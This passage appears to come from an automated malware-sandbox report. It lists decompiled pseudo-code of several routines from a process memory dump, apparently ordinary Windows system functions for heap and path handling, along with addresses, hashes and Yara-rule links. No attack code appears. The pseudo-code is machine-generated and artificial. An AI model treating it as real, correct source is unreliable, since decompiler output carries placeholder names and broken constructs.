					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4fa1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04FF1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E05003C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04FD8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x04fd8a0a
0x04fd8a1c
0x04fd8a23
0x04fd8a2e
0x04fd8a30
0x04fd8a36
0x04fd8a3c
0x04fd8a3e
0x04fd8a4a
0x04fd8a52
0x04fd8a9c
0x04fd8aae
0x04fd8a58
0x04fd8a5e
0x04fd8a6a
0x04fd8a6f
0x04fd8a75
0x04fd8a7d
0x04fd8a85
0x04fd8a86
0x04fd8a89
0x04fd8a93
0x04fd8a99
0x04fd8a9b
0x00000000
0x04fd8aaf
0x04fd8abe
0x04fd8ac3
0x04fd8acb
0x04fd8ad7
0x04fd8ae0
0x04fd8af1
0x00000000
0x04fd8af1
0x04fd8acd
0x04fd8ad5
0x04fd8afb
0x04fd8afd
0x04fd8aff
0x04fd8b07
0x04fd8b22
0x04fd8b24
0x04fd8b2a
0x04fd8b2e
0x04fd8b3f
0x04fd8b78
0x04fd8b41
0x04fd8b52
0x04fd8b54
0x04fd8b5c
0x04fd8b74
0x04fd8b74
0x04fd8b5c
0x04fd8b3f
0x04fd8b5e
0x04fd8b61
0x04fd8b64
0x04fd8b64
0x04fd8b6c
0x04fd8b6c
0x04fd8b11
0x05029cd5
0x05029cd5
0x04fd8b17
0x04fd8b1a
0x04fd8b1a
0x00000000
0x04fd8ad5
0x04fd8a89

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d79ad8158425725610a323f27e1a9eb8cc8c52f64c4738ac54ec0c9787e57d10
Instruction ID: 8030f8cc1c365b59a3a105171175afae853a75d252449dd891f47fc449fe21b0
Opcode Fuzzy Hash: d79ad8158425725610a323f27e1a9eb8cc8c52f64c4738ac54ec0c9787e57d10
Instruction Fuzzy Hash: 9A4151B1A4022C9BDB24EF15DC88AA9B7F5EF44340F1445E9D829D7252E770AE82CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0508FDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0508FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0508FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E05090A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E04FE7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E05081608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E05092B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0508C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0508DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E04FE7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0508A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0508fde7
0x0508fde8
0x0508fdec
0x0508fdee
0x0508fdf5
0x0508fdf7
0x0508fdfc
0x0508fe19
0x0508fe22
0x0508fe26
0x0508fec6
0x0508fecd
0x0508fed5
0x0508fee7
0x0508fed7
0x0508fee0
0x0508fee0
0x0508feef
0x0508ff00
0x0508ff02
0x0508ff07
0x0508ff07
0x00000000
0x0508feef
0x0508fe33
0x0508fe55
0x0508fe59
0x0508fe5b
0x0508fe5e
0x0508fe69
0x0508fe6d
0x0508fe6d
0x0508fe69
0x0508fe35
0x0508fe41
0x0508fe41
0x0508fe79
0x0508fe8b
0x0508fe7b
0x0508fe84
0x0508fe84
0x0508fe93
0x00000000
0x0508fea8
0x0508feba
0x00000000
0x0508feba
0x0508fdfe
0x0508fe01
0x0508fe02
0x0508fe08
0x0508ff0c
0x0508ff14
0x0508ff14

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 5c2775e5199d604f71a6b5c8858c5c955e41d496caa9b6157c074c02e3330550
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 9C31C232304A45AFD762AB78E849F7E7BEAEFC5650F184059E886CB742DB74D841C720

Uniqueness

Uniqueness Score: -1.00%

Function 0508EA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0508EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E04FE2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0508E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E04FCF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E04FDFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0508AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0508BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E04FE7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0507FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E04FDFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0508A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0508ea55
0x0508ea66
0x0508ea68
0x0508ea6c
0x0508ea6f
0x0508ea72
0x0508ea75
0x0508ea7a
0x0508ea7a
0x0508ea7e
0x0508ea80
0x0508ea85
0x0508ea8b
0x0508eab5
0x0508eabc
0x0508eabf
0x0508eabf
0x0508eaca
0x0508eace
0x0508ead0
0x0508eae4
0x0508eaeb
0x0508eaf0
0x0508eaf5
0x0508eb09
0x0508eb0d
0x0508eb1d
0x0508eb2d
0x0508eb38
0x0508eb3d
0x0508eb41
0x0508eb4a
0x0508eb60
0x0508eb4c
0x0508eb52
0x0508eb59
0x0508eb59
0x0508eb68
0x0508eb71
0x0508eb71
0x0508ea8d
0x0508ea8f
0x0508ea92
0x0508ea97
0x0508ea97
0x0508ea9b
0x0508ea9c
0x0508ea9e
0x0508eaa6
0x0508eaa6
0x0508eb7e

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: c26339652a47ab7517915fc95a2da29e3a5117ca6939293c6f15d6552dd1b6bd
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 6631A1726047059BD719EF24DC84E7FB7EAFBC4610F08492DE59687641EA30E809CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 050469A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E050469A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x50bd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04FD6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E05046BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E05009980() >= 0) {
							E04FE2280(_t56, 0x50b8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x50b8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x50b8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E04FCB6F0(0x4fac338, 0x4fac288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E05009520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E050095D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E04FDFFB0(_t68, _t77, 0x50b8778);
				}
				_pop(_t78);
				return E0500B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x050469b5
0x050469be
0x050469c3
0x050469c9
0x050469cc
0x050469d1
0x050469d3
0x050469de
0x050469e1
0x050469ea
0x050469f6
0x050469fe
0x05046a13
0x05046a14
0x05046a15
0x05046a16
0x05046a1e
0x05046a26
0x05046a31
0x05046a36
0x05046a37
0x05046a40
0x05046a49
0x05046a4a
0x05046a53
0x05046a59
0x05046a5d
0x05046a5e
0x05046a64
0x05046a67
0x05046a6a
0x05046a6d
0x05046a70
0x05046a77
0x05046a7d
0x05046a86
0x05046a89
0x05046a9c
0x05046a9f
0x05046aa2
0x05046aa5
0x05046aaf
0x05046ab1
0x05046ab8
0x05046ab9
0x05046abb
0x05046abe
0x05046ac5
0x05046ac5
0x05046aaf
0x05046a40
0x05046a26
0x050469fe
0x05046ace
0x05046ad0
0x05046ad3
0x05046ad8
0x05046adf
0x05046adf
0x05046ae8
0x05046aef
0x05046aef
0x05046af9
0x05046b06

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d2084b95a5dda663c8e42b97cc9277fc6fb742e0250404c3a919c894e7dc19
Instruction ID: 4c577f5a3082c5efeb06790c866c3b1a86ea9967e2490c226a792dc2ede18089
Opcode Fuzzy Hash: 31d2084b95a5dda663c8e42b97cc9277fc6fb742e0250404c3a919c894e7dc19
Instruction Fuzzy Hash: 12415CB1D006089FEB14CFA5E940BEEBBF8EF49714F148529E415A7250EB75A906CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04FC5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04FC5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E04FC52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E050095D0();
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E04FDEB70(_t54, 0x50b79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E050095D0();
								L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E04FDEB70(_t54, 0x50b79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0500F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E04FDEB70(_t54, 0x50b79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E050095D0();
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x04fc5220
0x04fc5224
0x05020d13
0x05020d16
0x05020d19
0x04fc522a
0x04fc522a
0x04fc522d
0x04fc522d
0x04fc5231
0x04fc5235
0x04fc5239
0x05020d5c
0x05020d62
0x00000000
0x00000000
0x05020d6a
0x05020d7b
0x05020d7f
0x05020d81
0x05020d84
0x05020d95
0x05020d95
0x05020d6c
0x05020d71
0x05020d71
0x05020d9a
0x00000000
0x04fc524a
0x04fc524a
0x04fc5250
0x05020d24
0x05020d35
0x05020d39
0x05020d3b
0x05020d3e
0x05020d50
0x05020d50
0x05020d26
0x05020d2b
0x05020d2b
0x00000000
0x05020d55
0x04fc5256
0x04fc525b
0x04fc5265
0x05020da7
0x04fc526b
0x04fc526e
0x04fc5272
0x05020db1
0x05020db4
0x05020dc5
0x05020dc5
0x04fc5272
0x04fc5278
0x04fc527e
0x04fc528a
0x04fc528c
0x04fc528d
0x00000000
0x04fc5280
0x04fc5282
0x04fc5288
0x04fc529f
0x04fc5292
0x00000000
0x04fc5292
0x00000000
0x04fc5288
0x04fc527e

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e86abc430d66939fd2ac3fcf721ee9c33f17f1f44e0993e1d2e851fe209a594b
Instruction ID: de66a96e4b365f772eeafa1ce700a84cd5924866927ae60c52da31a92525dc4b
Opcode Fuzzy Hash: e86abc430d66939fd2ac3fcf721ee9c33f17f1f44e0993e1d2e851fe209a594b
Instruction Fuzzy Hash: 31310532642B21EBD735AB18ED94FBE77E6FF50760F114A29E4560B1A1E770F801C690

Uniqueness

Uniqueness Score: -1.00%

Function 05003D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05003D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04FD7B60(0, _t61, 0x4fa11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04FD7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04FE4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x05003d4c
0x05003d50
0x05003d55
0x05003d5e
0x0503e79a
0x00000000
0x0503e79a
0x05003d68
0x0503e789
0x05003d9d
0x05003da3
0x05003daf
0x05003db5
0x05003dbc
0x05003dc4
0x05003dc9
0x05003dce
0x0503e7ae
0x0503e7ae
0x05003dde
0x05003de2
0x05003de7
0x05003e0d
0x05003e13
0x05003e16
0x05003e1e
0x05003e25
0x05003e28
0x00000000
0x00000000
0x05003e2a
0x05003e2f
0x05003e37
0x05003e37
0x00000000
0x05003e37
0x05003e31
0x00000000
0x05003e31
0x05003e20
0x05003e20
0x05003e35
0x00000000
0x05003de9
0x05003de9
0x05003de9
0x05003dee
0x05003dfd
0x05003dff
0x05003e02
0x05003e05
0x05003e05
0x00000000
0x05003df0
0x05003de7
0x0503e78f
0x0503e794
0x05003d79
0x05003d84
0x05003d89
0x05003d8e
0x00000000
0x0503e7a4
0x05003d96
0x05003d9a
0x00000000
0x05003d9a
0x00000000
0x0503e794
0x05003d6e
0x05003d73
0x00000000
0x0503e7b5
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d04c1bd85f123f6b6349d9af3734007a1cbad8211d20c65eb1406a8cf88dcc36
Instruction ID: 458731ff9680c955f4e88718921b555567707c0a75a96ffb6288fa3ac48f2333
Opcode Fuzzy Hash: d04c1bd85f123f6b6349d9af3734007a1cbad8211d20c65eb1406a8cf88dcc36
Instruction Fuzzy Hash: 3931A131604615DBE726CF29E841ABFBBEAFF45700B05897AE446CB390E730D841C790

Uniqueness

Uniqueness Score: -1.00%

Function 04FFA61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04FFA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x50a0220);
				E0501D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x50b7b9c; // 0x0
				_t55 = L04FE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0501D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x50b7b10 =  *0x50b7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x50b536c; // 0x320e300
					if( *_t51 != 0x50b5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x50b5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x50b536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E04FFA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x04ffa61c
0x04ffa61e
0x04ffa623
0x04ffa628
0x04ffa62b
0x04ffa62d
0x04ffa648
0x04ffa64a
0x04ffa64f
0x05039b44
0x04ffa6ec
0x04ffa6f1
0x04ffa6f1
0x04ffa655
0x04ffa657
0x04ffa65a
0x04ffa65d
0x04ffa662
0x04ffa663
0x04ffa667
0x04ffa668
0x04ffa66d
0x04ffa706
0x04ffa706
0x05039bda
0x05039be6
0x05039beb
0x00000000
0x05039beb
0x04ffa679
0x05039b7a
0x00000000
0x05039b7a
0x04ffa683
0x04ffa6f4
0x04ffa6f7
0x04ffa6f9
0x04ffa6fd
0x04ffa6a0
0x04ffa6a0
0x04ffa6ad
0x04ffa6af
0x04ffa6b4
0x05039ba7
0x05039bac
0x00000000
0x00000000
0x05039bc6
0x05039bce
0x05039bd1
0x05039bd3
0x05039bd3
0x00000000
0x05039bd1
0x04ffa6bd
0x04ffa6c3
0x04ffa6c6
0x04ffa6d2
0x04ffa701
0x04ffa704
0x00000000
0x04ffa704
0x04ffa6d4
0x04ffa6d6
0x04ffa6d9
0x04ffa6db
0x04ffa6e1
0x04ffa6e6
0x04ffa6e8
0x04ffa6e8
0x04ffa6ea
0x00000000
0x04ffa6ea
0x04ffa688
0x04ffa692
0x04ffa694
0x04ffa699
0x00000000
0x00000000
0x04ffa69d
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428646b25631be8ceccba7ed360068fb6f7b6ee3cc97b822b653026e09e4a776
Instruction ID: 1c8ae1786bc891193d97c5323dcf5491404091bf2afdbb12ce317754f01890fa
Opcode Fuzzy Hash: 428646b25631be8ceccba7ed360068fb6f7b6ee3cc97b822b653026e09e4a776
